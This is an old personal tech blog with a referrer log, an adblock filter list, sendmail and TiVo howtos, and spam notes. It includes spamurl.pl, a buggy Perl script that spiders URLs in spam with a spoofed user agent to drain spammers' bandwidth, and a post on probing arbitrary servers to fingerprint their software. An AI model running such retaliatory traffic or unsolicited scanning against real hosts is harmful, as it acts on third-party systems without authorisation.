http://www.myspace.com/index.cfm?fuseaction=user.viewProfile&friendID=3476835&Mytoken=20041222122128 -> /pics/people/david_hasslehoff_noshirt.jpg
http://www.myspace.com/index.cfm?fuseaction=user.viewProfile&friendID=3476835&Mytoken=20041222122138 -> /pics/people/david_hasslehoff_noshirt.jpg
http://www.myspace.com/index.cfm?fuseaction=user.viewProfile&friendID=3476835&Mytoken=20041222123550 -> /pics/people/david_hasslehoff_noshirt.jpg
http://www.myspace.com/index.cfm?fuseaction=user.viewProfile&friendID=3476835&Mytoken=20041222124857 -> /pics/people/david_hasslehoff_noshirt.jpg
http://www.myspace.com/index.cfm?fuseaction=user.viewProfile&friendID=3476835&Mytoken=20041222125850 -> /pics/people/david_hasslehoff_noshirt.jpg
http://www.myspace.com/index.cfm?fuseaction=user.viewProfile&friendID=3476835&Mytoken=20041222132911 -> /pics/people/david_hasslehoff_noshirt.jpg
http://www.myspace.com/index.cfm?fuseaction=user.viewProfile&friendID=3476835&Mytoken=20041222141815 -> /pics/people/david_hasslehoff_noshirt.jpg
http://www.myspace.com/index.cfm?fuseaction=user.viewProfile&friendID=3476835&Mytoken=20041222143415 -> /pics/people/david_hasslehoff_noshirt.jpg
http://www.myspace.com/index.cfm?fuseaction=user.viewProfile&friendID=3476835&Mytoken=20041222144306 -> /pics/people/david_hasslehoff_noshirt.jpg
http://www.myspace.com/index.cfm?fuseaction=user.viewProfile&friendID=4705434&Mytoken=20041221131056 -> /pics/people/david_hasslehoff_noshirt.jpg
http://www.myspace.com/index.cfm?fuseaction=user.viewProfile&friendID=4705434&Mytoken=20041221132225 -> /pics/people/david_hasslehoff_noshirt.jpg
http://www.myspace.com/index.cfm?fuseaction=user.viewProfile&friendID=4705434&Mytoken=20041221220157 -> /pics/people/david_hasslehoff_noshirt.jpg
http://www.myspace.com/index.cfm?fuseaction=user.viewProfile&friendID=4705434&Mytoken=20041222013121 -> /pics/people/david_hasslehoff_noshirt.jpg
http://www.myspace.com/index.cfm?fuseaction=user.viewProfile&friendID=669099&Mytoken=20041221181322 -> /pics/people/david_hasslehoff_noshirt.jpg
http://www.na-magodai.net/forums/viewthread.php?tid=23 -> /pics/people/david_hasslehoff_noshirt.jpg
http://www.oldschoolgamers.net/index.php?s=66be3cb8a5fcedeaf1d545540473e13e&showtopic=8909 -> /pics/people/batboy.jpg
http://www.oldschoolgamers.net/index.php?showtopic=8909&st=20 -> /pics/people/batboy.jpg
http://www.oldschoolgamers.net/index.php?showtopic=8909&st=20&#entry113211 -> /pics/people/batboy.jpg
http://www.oldschoolgamers.net/index.php?showtopic=8909&st=20&#entry113246 -> /pics/people/batboy.jpg
http://www.pipinghotloaf.com/pics/people/?D= -> /icons/back.gif
http://www.pipinghotloaf.com/pics/people/?D= -> /icons/blank.gif
http://www.pipinghotloaf.com/pics/people/?D= -> /icons/unknown.gif
http://www.pipinghotloaf.com/pics/people/?D= -> /pics/people/boobies.jpg
http://www.saddle-creek.com/webboard/viewtopic.php?t=50016&highlight=sting -> /pics/people/batboy.jpg
http://www.sternchat.com/boards/showthread.php?t=977&page=21&pp=20 -> /pics/people/batboy.jpg
http://www.sternchat.com/boards/showthread.php?t=977&page=45&pp=20 -> /pics/people/batboy.jpg
http://www.tropicanopolis.blogspot.com/ -> /pics/people/batboy.jpg
http://www.ucbtheatre.com/forum/viewtopic.php?t=239 -> /pics/people/batboy.jpg
http://www.ultimatemetal.com/forum/showthread.php?p=3479673 -> /pics/people/batboy.jpg
http://www.ultimatemetal.com/forum/showthread.php?p=3480027 -> /pics/people/batboy.jpg
http://www.xanga.com/home.aspx?user=DeeGrl13&nextdate=12%2f5%2f2004+0%3a18%3a3.453&direction=n -> /pics/people/david_hasslehoff_noshirt.jpg

Posted by skp at 02:04 PM
dezembro 09, 2004
spamurl.pl

In the spirit of the (now dead) makelovenotspam project, i wrote a little perl code to visit and gently spider the urls in any spam tagged email i receive, in an effort to drive up the cost of business for spammers and those who fund them. here's the file: spamurl.pl, use it at your own risk, though i've been running it for a day and haven't seen any issues. also, my perl is a bit rusty... coments appreciated.

so here's the theory: i pay a webhost $50/month for 6gb of bandwidth to sell viagra. if within that 6bg of traffic 0.01% buys something, then i've made a profit. what i'm doing is a) taking up a little of their allocated bandwidth and b) not buying anything. really it's stupid to advertise your dumb website through spam... stop it, please.

yes i've linked directly to the file, but i'll paste it here just because:

#!/usr/bin/perl

## spamurl.pl v1.2 by skp Dec 09 2004
## parses incoming mail through stdin and
## visits any urls it finds, dumping any
## returned data to /dev/null
##
## usage: put the following in ~/.procmailrc after spamassassin
## :0 HBc
## * ^X-Spam-Status: Yes
## | /usr/local/bin/mailurl.pl
##
## in the spirit of the makelovenotspam project, i visit and
## slighty spider the urls in any spam tagged email in an
## effort to drive up the cost of business for spammers and
## those who fund them. -skp
##

use URI::Find::Rule;
use WWW::Curl::easy;

while () {
$_ =~ s/[\015\012\032\r\n]//g;
$_ =~ s/\s+$//;
my($line) = $_;
chomp($line);

my @urls = URI::Find::Rule->scheme('http')->in($line);

for my $url (@urls) {
$url = $url->[1];

local $body = "";
sub chunk { my ($data,$pointer)=@_; ${$pointer}.=$data; return length($data) }

$url =~ s/[\<\>]//; # remove < from urls
$url =~ s/[\?\%\&\(\)\'\`\"\;].*//g;

my $curl= WWW::Curl::easy->new() or die "curl init failed\n";
open(DEVNULL,">>/dev/null") or die;
$curl->setopt(CURLOPT_STDERR,*DEVNULL);
$curl->setopt(CURLOPT_WRITEHEADER,*DEVNULL);
$curl->setopt(CURLOPT_WRITEDATA,*DEVNULL);
$curl->setopt(CURLOPT_ERRORBUFFER,*DEVNULL);

$curl->setopt(CURLOPT_WRITEFUNCTION,\&chunk);
$curl->setopt(CURLOPT_FILE,\$body);

$curl->setopt(CURLOPT-NOSIGNAL,"1");
$curl->setopt(CURLOPT_FRESH_CONNECT,"1");
$curl->setopt(CURLOPT_FORBIT_REUSE,"1");
$curl->setopt(CURLOPT_CONNECTTIMEOUT,"6");
$curl->setopt(CURLOPT_MAXCONNECTS,"18");
$curl->setopt(CURLOPT_TIMEOUT,"30");

$curl->setopt(CURLOPT_REFERER,"$url");
$curl->setopt(CURLOPT_USERAGENT,'Mozilla/4.0 (compatible; Firefox; Windows NT 5.1)');
$curl->setopt(CURLOPT_FOLLOWLOCATION,1);
$curl->setopt(CURLOPT_URL,$url);

$curl->perform(); # do it
sleep int(rand(15)); # randomly sleep a number of seconds up to 15

@urlb = URI::Find::Rule->scheme('http')->in($body);
for $urlb (@urlb) {
$urlb = $urlb->[1]; # here i'm visiting any urls in the html of the original url

$urlb =~ s/[\<\>]//; # remove < from urls
$urlb =~ s/[\?\%\&\(\)\'\`\"\;].*//g;

if ("$urlb" ne "$url" && "urlb" ne "$urlc") {
$curl->setopt(CURLOPT_URL,"$urlb");
$curl->perform();
sleep int(rand(15)); # randomly sleep a number of seconds up to 15
$urlc = $urlb;
}
}

WWW::Curl::easy::global_cleanup();
}

}

Posted by skp at 02:00 PM
novembro 29, 2004
firefox is badass

my new love: firefox with adblock. also don't forget to import a few cool filter lists into adblock, since it starts out with an empty ruleset. another good extension for firefox: tinyurl bar.

spent thanksgiving with family in so-cal: ate food, went to a mall and fixed a few computers. first off, how long is it going to take the anti-virus companies (symantec) to take the hint... the next killer app for them is spyware. seriously, if anyone was awake they'd have already bought spybot ssd (search and destroy) since it totally kicks ass. the first thing i do when i get my hands on ANY windows box is 1) install spybot ssd and 2) install spywareblaster. also don't forget to enable expert mode in ssd and add their hosts file whatnots

here's my ruleset after merging it with the ones i lined to above, also here is a step by step guide to install adblock onto your firefox:

1) right-click download this to your desktop: adblock.txt

2) go to http://update.mozilla.org/extensions/ to download and install adblock

3) after installing it, completely quit and restart firefox

4) in firefox, go to Tools-Adblock-Preferences, Adblock Options, Import Filters

5) import the adblock.txt you downloaded from fif3. done

[Adblock]
*-ad.cgi*
*.addaddy.net/*
*.babylonbucks.com/*
*.bride.ru
*.directresponse.com
*.imgehost.com/*
*.inetc.net/*
*.linkbuddies.com
*.mediaturf.net
*.simtel.net/gfx/*
*/Ads/*
*/Adv/*
*/RealMedia/ads/*
*/ad/*
*/ad_image/*
*/adimage.php?*
*/adimages/*
*/admentor/*
*/adrevolver/*
*/ads/*
*/adserv/*
*/adserve/*
*/adserver/*
*/advertisement.gif
*/advertising/*
*/adverts/*
*/affiliates/*
*/banner/*
*/bannerads/*
*/bannerit/*
*/banners/*
*/clickability/*
*/fastclick/*
*/featuread/*
*/houseads/*
*/liveads/*
*/marketing/*
*/offsite-banners/*
*/pagead/*
*/phpAdsNew/*
*/phpads/*
*/smartserve/*
*/softad/*
*/sponsor/*
*/sponsors/*
*/spymagic/*
*/viewad/*
*Banner-468x60*
*a*.yimg.*
*adblaster*
*adbureau.*
*adbutler.de
*adsdk.com*
*advertising.*
*atdmt.com*
*bannermania*
*bannermania.*
*bizrate.com
*bluestreak.*
*cash4banner*
*crazypopups.com
*doubleclick*
*exchangead.*
*eyeblaster-bs.*
*falkag.net
*fastclick.*
*hitbox.com
*i.imdb*
*mediaplex*
*popupad.net
*qkimg.net
*qksrv.net*
*rcm.amazon.com/*
*spinbox.*
*spylog*
*thecounter*
*tradedoubler.com
*tribalfusion*
*us.*1.yimg.*
*valueclick*
*world.dk/Pictures/cw_barracuda_instada.gif
*zdmcirc.*
/.*adcycle\.cgi\?.*/
/BannerSource/
/[\W\d]banner(s|id\=)[\W\d]/
/\D\d{2,3}x\d{2,3}\D/
/\Wad(server|s)?[\W\d](\/|\.)/
/\Wgoogle(adservices|syndication)\W/
/adframe/
/banners.php/
/bd.m?
/clickserve/
/doubleclick/
/hitbox.com/
/linkexchange.com/
/sp(onsor|ymagic)/
/top(100|cto)/
1x1.gif
TOP_BANNER
ads.auctions.yahoo.com/*
ads.osdn.com/*
adview.php
http://*.adsdk.com
http://*.adserver.com/*
http://*.akamai.net/*/ads/*
http://*.as-us.falkag.net/*
http://*.doubleclick.net/*
http://*.fark.com/*/adimage*
http://*.fark.com/*/adview*
http://*.googlesyndication.com/pagead/*
http://*.instacontent.net
http://*.trafficmp.com/*
http://*/ads/*
http://*servedby.advertising.com/*
http://205.180.85.40/*
http://69.57.136.40/*
http://a.as-eu.falkag.net/*
http://a.as-us.falkag.net/*
http://a12.g.akamai.net/*
http://a619.g.akamai.net/*
http://ad.linkexchange.com/*
http://adfarm.mediaplex.com/*
http://adimg.cnet.com/*
http://adlog.com.com/*
http://admin.digitalacre.com/images/object/1573/object.GIF
http://ads.*
http://ads.accelerator-media.com/*
http://ads.osdn.com/
http://ads.osdn.com/*
http://adserv.*
http://adserver*
http://adserver.*
http://adserver.securityfocus.com
http://adsremote.scripps.com
http://adtech.*
http://adverts.loadedinc.com/*
http://ar.atwola.com/*
http://as1.falkag.de/*
http://atdmt.com
http://bannerimages.*
http://banners.*
http://bans.bride.ru/*
http://bitzi.com/*
http://c1.zedo.com/*
http://cdn.valueclick.com/*
http://cl.cnn.com/ctxtlink/*
http://creativeby.viewpoint.com/*
http://cserver.mii.instacontent.net/*
http://ds.serving-sys.com/BurstingRes/*
http://fuck-access.com/*
http://geocities.com/js_source/geov2.js
http://gfx.dvlabs.com/klipmart/*
http://http.content.ru4.com/*
http://image.weather.com/creatives/ONDCP/*
http://image.weather.com/creatives/match/*
http://image.weather.com/creatives/wanderlodge/*
http://images.ibsys.com/*/sponsors/*
http://images.x10.com
http://imdb.com/google/*
http://img.fark.com/images/*/ads/*
http://klipmart.dvlabs.com/*
http://lisa.belointeractive.com/*
http://mads.zdnet.com/mac-ad?*
http://majorgeeks.com/rm/*
http://media.fastclick.net/*
http://media.pointroll.com/*
http://mediamgr.ugo.com/*
http://mirror.pointroll.com/*
http://pagead.googlesyndication.com/*
http://pagead2.googlesyndication.com/pagead/ads?*
http://partners.ditto.com/*
http://php.fark.com/pa/adimage*
http://php.fark.com/pa/adjs*
http://php.fark.com/pa/adview.php*
http://s0b.bluestreak.com/*
http://servedby.advertising.com
http://servedby.advertising.com/*
http://server-dk.imrworldwide.com/*
http://spd.atdmt.com/*
http://spe.atdmt.com/*
http://sportsbybrooks.com/farkbutton*
http://tribalfusion.speedera.net/*
http://us.a*.yimg.com/us.yimg.com/a/*
http://us.a1.yimg.com/*
http://us.a1.yimg.com/*/a/*
http://us.i1.yimg.com/us.yimg.com/i/mc/mc.js
http://us.yimg.com/a/ya/*
http://view.atdmt.com/*
http://view.popupsponsor.com/
http://warp.crystalad.com/*
http://www.ad.*.com
http://www.brinkster.com/brinkad.js
http://www.bullz-eye.com/pictureofday*
http://www.eyeblaster-bs.com/BurstingPipe/BannerSource.asp?*
http://www.flowgo.com/*
http://www.geocities.com/js_source/pu5geo.js
http://www.geocities.com/js_source/ygNSLib9.js?v3
http://www.hardwarezoom.com/images/ads/*
http://www.hardwarezoom.com/images/promotions/*
http://www.qksrv.net/*
http://www.resellerratings.com/*
http://www.tek-tips.com/jsource.js
http://www3.bannerspace.com/*
http://xlonhcld.xlontech.net/
img.thebugs.ws
reklama
sexcounter.*
statse.webtrendslive.com
us.yimg.com/a/
yimg.com/*.js
Posted by skp at 10:32 AM
março 03, 2004
unlimited mail aliases

i was surprised the other day when i realized that to many people, email addresses are a finite resource. i take for granted that i can make a new alias whenever i want... at no cost. i suppose the requirements are that you own a domain and have some control over your MX host. ANYWAY, i've make a quick cgi for the world to create their own aliases on my server. check it out: www.fif3.com/alias.html. i need to make it look better... but it works.

Posted by skp at 10:07 AM
janeiro 27, 2004
encrypted mail for osx

use your thawte certificate seamlessly in mac mail. osx makes it easy. wow love it. yah i won't bother with making another keychain... if someone is sitting at my box, logged in, the game's over anyway.

How to Set Up Encrypted Mail on Mac OS X by François Joseph de Kermadec -- The latest version of Apple's Mail app, included with the Panther upgrade, supports S/MIME security and encryption. But how do you go about getting a certificate and taking advantage of this feature? François Joseph de Kermadec shows you how, step by step.

Posted by skp at 09:53 AM
dezembro 11, 2003
install stuff with perl cpan

forgot this command: perl -MCPAN -e shell

crap. now darwin can't find my /System/Library/Perl/5.8.1/darwin-thread-multi-2level/CORE/perl.h

$ sudo find / -name perl.h
/System/Library/Perl/darwin/CORE/perl.h

hrm. $ cp -i /System/Library/Perl/darwin/CORE/* /System/Library/Perl/5.8.1/darwin-thread-multi-2level/CORE/
sudo perl -MCPAN -e shell

mmmmm all is good

Posted by skp at 03:03 PM
setembro 30, 2003
application featureprinting

application featureprinting: the art of identifying different versions and flavors of applications which use the same protocol by their implementations (or lack thereof) of protocol features.

did this last year for smtp... it's simple: take a protocol rfc and the most popular implementations of said protocol, write a quick test script to check all possible commands and error codes, and throw it against anything you can get your hands on. though of sticking it up here since i'm doing ftp. must be a couple dozen ftp commands, but only like 16 are needed to properly differentiate application vendors.

this is cool because admins can change their banners all they want, and i'll still know exactly what they're running. in many cases down to the app version and patch level. fun.

application fingerprinting, almost the same as application featureprinting except for i just made a buzzword.

Posted by skp at 06:17 AM
setembro 03, 2003
active smtp firewall using PF

1) because the MTAs you care about follow RFC
2) because bitch spammers spoof and sendmail rejects
3) because anyone trying to relay through me should go away

www.fif3.com/code/listenblock.txt

here's some log examples:
www.fif3.com/code/listenblock.log.txt

check fif3.com/code for the latest version

take ngrep and a list of smtp errors generated by spammers and script kiddie abuse, pass it to a packet filter table and *boom* damn you've got a little protocol aware active smtp firewall. don't forget to precede the blocking of hosts caught by this with a whitelist... just in case. (though i have yet to block anyone who didn't deserve it)

Posted by skp at 07:32 PM
agosto 21, 2003
mac os x boot up keys

since i always forget when they're needed... here's some of the os x boot keys that do stuff

Command-S Boot into Single User Mode
Command-V Boot using "Verbose" mode (shows all kernel and startup console messages)
X Reset startup disk selection and boot into Mac OS X Server
Shift Boot into "Safe Boot" mode, which runs Disk First Aid. A reboot will be required afterward.
Option Boot into Open Firmware to select a boot device
Command-Option-Shift-Delete Bypass internal harddrive on boot
T Boot into Firewire target disk mode
C Boot from the internal optical drive
N Start from the Network (NetBoot)
Command-Option-P-R Reset Parameter RAM (PRAM) and non-volatile RAM (NVRAM)
(mouse button) Eject (internal) removable media

ALSO: if you use open firmware password... you'll need this:
Startup Manager -accessed by pressing the Option key during startup
Enter commands after starting up in Open Firmware -press Command-Option-O-F key combination during startup.

http://docs.info.apple.com/article.html?artnum=106482

How to troubleshoot a computer with Open Firmware Password enabled
If you cannot access the Open Firmware Password application and need to troubleshoot your computer by:

Resetting the PRAM
Starting up in Single-user mode
Starting up in Verbose mode
Starting from CD-ROM

Then follow these steps:

Start up into Open Firmware by pressing and holding the Command-Option-O-F key combination during startup.
At the Open Firmware prompt, type: reset-nvram
Press Return.
When prompted for your password, enter it and press the Return key. It responds OK.
At the Open Firmware prompt, type: reset-all
Press Return.

The computer restarts and you are now be able to reset the PRAM and startup in Single-user mode, Verbose mode, or from CD-ROM.

Posted by skp at 10:33 AM
julho 25, 2003
favorite html error

it's funny to have a great errordoc on your webserver:

HTML
HEAD
META NAME="KeyWords" CONTENT="100 Continue 101 Switching Protocols 200 OK 201 Created 202 Accepted 203 Non-Authoritative Information 204 No Content 205 Reset Content 206 Partial Content 300 Multiple Choices 301 Moved Permanently 302 Found 303 See Other 304 Not Modified 305 Use Proxy 306 (Unused) 307 Temporary Redirect 400 Bad Request 401 Unauthorized 402 Payment Required 403 Forbidden 404 Not Found 405 Method Not Allowed 406 Not Acceptable 407 Proxy Authentication Required 408 Request Timeout 409 Conflict 410 Gone 411 Length Required 412 Precondition Failed 413 Request Entity Too Large 414 Request-URI Too Long 415 Unsupported Media Type 416 Requested Range Not Satisfiable 417 Expectation Failed 500 Internal Server Error 501 Not Implemented 502 Bad Gateway 503 Service Unavailable 504 Gateway Timeout 505 HTTP Version Not Supported"
/HEAD
BODY
/BODY
/HTML

Posted by skp at 01:45 PM
julho 08, 2003
pure TiVo extract with TyTool, TyStudio and dvdauthor

favorite thing: cartoon networks adult swim. to pull the shows off the TiVo and burn a dvd, do this:

*prep done once*
1) check out the TiVo extraction forum at dealdatabase.com

2) install the latest TyTool and TyStudio on your windows box

3) run the latest tserver binary onto your TiVo box (from TyTool). Note you'll need to have network access to your tivo via either a usb network card or tivonet/turbonet, have enabled telnet in your /etc/rc.d/rc.startup or rc.network script or the ,#401 dial prefix hack. so telnet in and run tivoftp from /var/hack or wherever it is you extracted it to. now you can upload tserver_mfs7 and NowShowing.tcl. don't forget to chmod a+x them. when you're ready to download off the tivo with TyTool, just telnet in and ./tserver_mfs7 & and logout.

*done every time you download from TiVo*
1) use TyTool to download the video .ty files

2) use TyStudio to edit out commercials and transcode to .mpeg (this can be done with TyTool... but i like TyStudio better for this step)

3) since i don't want any goofy menu system, i simply use dvdauthor (command line) to batch finish the job. download and install cygwin, then download and compile dvdauthor (see extended entry for scriptie goodness)

here's my dvdauthor command line fun. (only works if you've got cygwin installed)

dvdauthor.exe -o . -t -v ntsc+16:9+720xfull -a ac3 `for i in * ;do echo "-f $i" ;done |xargs` && dvdauthor.exe -o . -T

so before you run it, cd to the directory where you've got nothing except the .mpeg files that you want on one dvd. after it finishes, you'll have a new VIDEDO_TS directory ready for burning, with each .ty file having been merged into a few big .vobs and each .ty will be a separate chapter within the .vob files. (NOTE the filenames can't have any spaces in them because of the ghetto script i wrote)

anyway, now you've got a VIDEO_TS directory ready to burn with nero

Posted by skp at 09:48 PM
junho 09, 2003
pain in the sasl

swear... couldn't complie cyrus-sasl. pissing me off. finally got it. someone said to export LIBS="-ldb -lcrypto" but really the Makefile is way screwed up. all this just to get sendmail with smtp auth and ssl. as if anyone wants to read the crap i mail anyway.

with thanks to Craig Outcalt for pointing out the original
OpenBSD Sendmail + SMTP AUTH Mini-HOWTO [local ]

This howto will detail how to (durh) set up the version of sendmail included with OpenBSD 3.3 to accept authentication via Cyrus SASL.
install cyrus sasl v2
# cd /usr/ports/security/cyrus-sasl2 ; make install clean
enable SASL in sendmail
# echo WANT_SMTPAUTH= yes >> /etc/mk.conf
set up a "proper" libsasl2
# cd /usr/local/lib; ln -s libsasl2.so.2.11 libsasl2.so
# cd /usr/src/gnu/usr.sbin/sendmail
edit cf/cf/openbsd-proto.mc
after the FEATURE(`no_default_msa') line, add:
MASQUERADE_AS(` domain.org ')
LOCAL_DOMAIN(` fqdn.of.machine.org ')
LOCAL_DOMAIN(` domain.org ')
define(`confAUTH_MECHANISMS',`PLAIN CRAM-MD5 DIGEST-MD5')dnl
TRUST_AUTH_MECH(`PLAIN CRAM-MD5 DIGEST-MD5')dnl
note that if you want to recieve mail for other domains you
can add LOCAL_DOMAIN directives as needed, but be sure to remove all MASQUERADE_AS directives, otherwise it treats every email from squirrelmail (and perhaps other things) as coming from the last MASQUERADE_AS domain. we'll let the mua take care of tacking a domain onto the email.
build sendmail
# make && make install && make clean
install the new config file
# cp cf/cf/openbsd-proto.cf /etc/mail/sendmail.cf
add the SASL config file
we'll be using the sasldb, so...
# echo pwcheck_method: sasldb > /usr/local/lib/sasl2/Sendmail.conf
add users with /usr/local/sbin/saslpasswd2 username
saslpasswd2 may complain about kerberos, it may be helpful to
# touch /etc/kerberosIV/srvtab
to silence some of the warnings
edit /etc/rc.conf
remove -C/etc/mail/localhost.cf from sendmail_flags
kill the existing sendmail
# ps aux | grep [s]endmail | awk '{print $2}' | xargs -n 1 kill
start the new sendmail
# . /etc/rc.conf
# sendmail $sendmail_flags
cross your toes, it might work...
here's the config file i use: dorkzilla.mc


STARTTLS
if you want STARTTLS support, add the following to your .mc file:
define(`confCACERT_PATH',`/etc/mail/certs')
define(`confCACERT',`/etc/mail/certs/ca-bundle.crt')
define(`confSERVER_CERT',`/etc/mail/certs/sendmail.pem')
define(`confSERVER_KEY',`/etc/mail/certs/sendmail.pem')
then run the following commands to generate your self-signed certificates (unless you ponied up $300 to Thatwe)..
# mkdir /etc/mail/certs
# cd /etc/mail/certs
# PEM1=`mktemp /tmp/openssl.XXXXXX`
# PEM2=`mktemp /tmp/openssl.XXXXXX`
# openssl req -newkey rsa:1024 -keyout $PEM1 \
-nodes -x509 -days 365 -out $PEM2
# cat $PEM1 > sendmail.pem
# echo "" >> sendmail.pem
# cat $PEM2 >> sendmail.pem
# cp $PEM2 ca-bundle.crt
# rm $PEM1 $PEM2
# chmod 400 sendmail.pem
# chmod 400 ca-bundle.crt
and, of course, recreate /etc/mail/sendmail.cf and restart sendmail.

thanks to Richard Harms for pulling this information out of a RedHat 8.0 install. see http://flint.kitiara.com/Lists-Archives/l-cialug-0306/msg00023.html [local ] and http://flint.kitiara.com/Lists-Archives/l-cialug-0306/msg00025.html [local ]


SSMTP ssmtp (on port 465) is the other half-assed hack to get encryption on an smtp connection. there's a _FFR (for future release) option you can compile into sendmail to enable this feature.

compile _FFR_SMTP_SSL into sendmail
patch /usr/src/gnu/usr.sbin/sendmail/sendmail/Makefile
--- gnu/usr.sbin/sendmail/sendmail/Makefile Sun Jun 8 15:43:33 2003
+++ gnu/usr.sbin/sendmail/sendmail/Makefile Sun Jun 8 15:05:56 2003
@@ -9,7 +9,7 @@
WANT_LIBSMUTIL=1

# For TLS/SSL support
-ENVDEF+= -DSTARTTLS
+ENVDEF+= -DSTARTTLS -D_FFR_SMTP_SSL
LDADD+= -lssl -lcrypto
DPADD= ${LIBSSL} ${LIBCRYPTO}
re-build sendmail
# cd /usr/src/gnu/usr.sbin/sendmail
# make clean && make
# make install

enable ssmtp in /usr/src/gnu/usr.sbin/sendmail/cf/cf/openbsd-proto.mc
# cd /usr/src/gnu/usr.sbin/sendmail/cf/cf
add the following line to openbsd-proto.cf
DAEMON_OPTIONS(`Family=inet, Port=465, Name=MTA-SSL, M=s')dnl
rebuild and install the config
# make
# cp openbsd-proto.cf /etc/mail/sendmail.cf

restart sendmail
kill the existing sendmail
# ps aux | grep [s]endmail | awk '{print $2}' | xargs -n 1 kill
start the new sendmail
# . /etc/rc.conf
# sendmail $sendmail_flags
thanks to David Magda for pointing out a post to comp.mail.sendmail [local ] from Andrzej Filip (originally from Krzysztof Oledzki on pl.comp.mail.mta ) to enable this feature

CYRUS-IMAPD
if you'd like an imap and pop3 server, i suggest reading this: http://www.monkey.org/openbsd/archive/ports/0302/msg00266.html [ local ] ... a port of cyrus-imapd 2.1.12 for openbsd. makes life easier (but make sure you install /usr/ports/databases/db first). also note that if you remove libotp.* from /usr/local/lib/sasl2 OTP secrets will not be created and *-MD5 authentication will fail.


copyright ©2003 david l goodrich ... this document may be copied in its entirety if proper credit is given to the author. if anything breaks, it's not my fault. this should work, but i offer no warranty for the usability, etc, etc, of this document.
#include

Posted by skp at 03:20 PM
maio 29, 2003
favorite spammer MTAs

omg. i had this cool idea while groking raw mail files... i don't need to portscan the internet for smtp hosts, they mostly add their type/version to the email headers of messages that pass through. cool. then i noticed a few MTAs that i've never seen before...

omg. i had this cool idea while groking raw mail files... i don't need to portscan the internet for smtp hosts, they mostly add their type/version to the email headers of messages that pass through. cool. then i noticed a few MTAs that i've never seen before...

check this out. they almost exclusively show up in spam:

PowerMTA http://www.port25.com/products/pmta/
personal: 0
list: 0
spam: 1455

LSMTP http://www.lsoft.com/products/
personal: 1
list: 4
spam: 2885

sample mail file sizes:
personal: 24mb
list: 179mb
spam: 149mb

Posted by skp at 08:54 AM
maio 28, 2003
images screwed up

hrmmm something's wonky. my site views fine in safari, mozilla and ie on mac... but for some reason only some pictures (if any) show up under ie or mozilla on pc. they just kinda randomly appear or not. right now ie on win xp shows the first, third and fourth thumbnails across the top of the howto blog. grrr. oh wait i refreshed and now none are there. damn.

here's an excerp from my post on movabletype.org's support page

i've been using MT for a while now, but recently created a photoblog to SSI into my main. it all works, except i've noticed that images are randomly missing when i use IE on PC.

[URL=http://www.fif3.com/howto/]my main blog[/URL] views fine in safari, mozilla and ie on mac... but for some reason only some pictures (if any) show up under ie or mozilla on pc. they just kinda randomly appear or not. right now ie on win xp shows the first, third and fourth thumbnails across the top of the howto blog. grrr. oh wait i refreshed and now none are there. damn.

so last night i started eliminating the variables... i noticed that the same thing happens on [URL=http://www.fif3.com/photoblog/]the photoblog[/URL] page (so it's not the server side includes) and then i started trimming down the index template to see if IE was barfing on some code. heh. i've trimmed my index template down to like 5 lines... and still IE on my WinXP box won't show any of the pictures. tailing the apache error log, nothing shows up. same as the sql error log. it's wierd. what IE seems to be doing is loading the pictures and never finishing. it just sits there spinning.

funny thing is, IE seems to do this on other websites too, such as the [URL=http://www.moonpost.com/jeremy/]photoblog tutorial site[/URL]. note this isn't just my browser... i've had some friends verify that their browsers don't load the images either.

any ideas? thanks. -skp

Posted by skp at 08:37 AM
maio 27, 2003
photoblog

so i think i figured out this photoblog thing. had to create a new movabletype blog and play with the templates a bit, then server-side include the output into my main blog. it's easy, kinda. good reference site was www.moonpost.com/jeremy/photolog5steps.html
also check http://www.virtualvenus.org/wiki/view/MT/PhotoBlogTutorials

Posted by skp at 02:03 PM
maio 16, 2003
the next logical step is

as if apple wasn't about to release the sdk for their protocol... people get all freaked out because of a few cool utilities such as iLeech, ShareiTunes and iSuck. really, can't people understand? freaking calm down... damn now i really wanna go buy an iPod.

from iLeech website:

iLeech May 15, 2003:

All I can say is "Wow". In my wildest dreams I would not have imagined the reaction/attention my simple little Java/Cocoa application would receive. When I initially released it, I had honestly never imagined more than a couple of dozen people would be interested in it. Call me naive if you will, but that is the truth on my end.

iLeech appears to be the talk of the 'community', for both positive and negative reasons. I have no problems with people stating their feelings on the application, but I would kindly ask people refrain from taking cheap shots at me personally. A lot of what I've read, some people have resorted to what is essentially slander, and while I would never pursue that in a court of law... I would ask those to please keep their feelings about iLeech relegated to the application itself, and not about me personally. If you do decide to continue taking shots at me personally, so be it. There is nothing I can do to stop that, however I do kindly ask that you refrain.

Due to the flood of emails I've received regarding this application, both positive and negative, I have decided to take a few days off from development while I reevaluate the project. Now please realize, this isn't due to pressure from those who against the project. This isn't due to pressure from lobbyist organizations. This isn't due to me caving in to anybody. Again, when I had written this application, I had never imagined the attention it would receive. I would like to take the next few days to reevalutate if this project is worth continuing, in regards to both development aspects, and my personal involvement responding to people (on both sides of the fence), etc. I hope people can understand my decision to do this and can be patient for the next couple of days. And again please understand... For the people that are against this project, you haven't "won" anything. And for the people that are supportive of the project, you haven't "lost". This is just time to allow me to reevaluate the time I want to put into the project from this point forward.

Regardless of the outcome, I'm 99% confident I will still release v0.3 on Saturday (day behind schedule). I'm quite proud of the cleanup that has taken place, as well as some of the other features that have been implemented. It's been fun learning Cocoa/Java (which there is such a lack of existing examples for).

And if I do decide to stop further development of iLeech, the content that has been posted here on Source Forge will remain (v0.1, v0.2, v0.25, etc). If I do stop, somebody can gladly step up and take over administration/development of the project.

Check back Saturday, May 17th for the 'verdict' (so to speak) and iLeech v0.3.

Also as a helpful hint for the people that are against the project... I read on one Mac message board, a thread that related to an LA Times article about people 'exploiting' iTunes v4.0 to copy songs. The article never mentioned applications specifically, but in the thread on the Mac site, people that were against iLeech made specific mention to it (in some cases providing URLs). You have probably done more damage to your cause than good. People that were reading that thread that were ignorant to the applications available (and iLeech certainly isn't the only one) now knew of a specific application to download. Remember: there is no such thing as bad publicity. I understand your stance on the application, but making specific references to it only helps those who you wish to stop.

And here are some various links with discussion about iLeech (and other applications):

http://www.macslash.org/articles/03/05/15/0320251.shtml
http://www.kottke.org/03/05/030514itunes_4_is_.html
http://www.deleet.de/projekte/daap/
http://arstechnica.infopop.net/
http://blogdex.media.mit.edu/track.asp?id=5547898
http://www.metafilter.com/mefi/25766
http://maccentral.macworld.com/news/2003/05/14/ituneshole/
http://www.spymac.com/forums/showthread.php?s=&postid=367561
http://www.avantbard.com/blog/archives/000177.html
http://www.daypop.com/top/
http://www.de-bug.de/news/1565.html
http://techlawadvisor.blogspot.com/
http://www.nypost.com/technology/75803.htm
http://blogs.law.harvard.edu/cmusings/2003/05/14
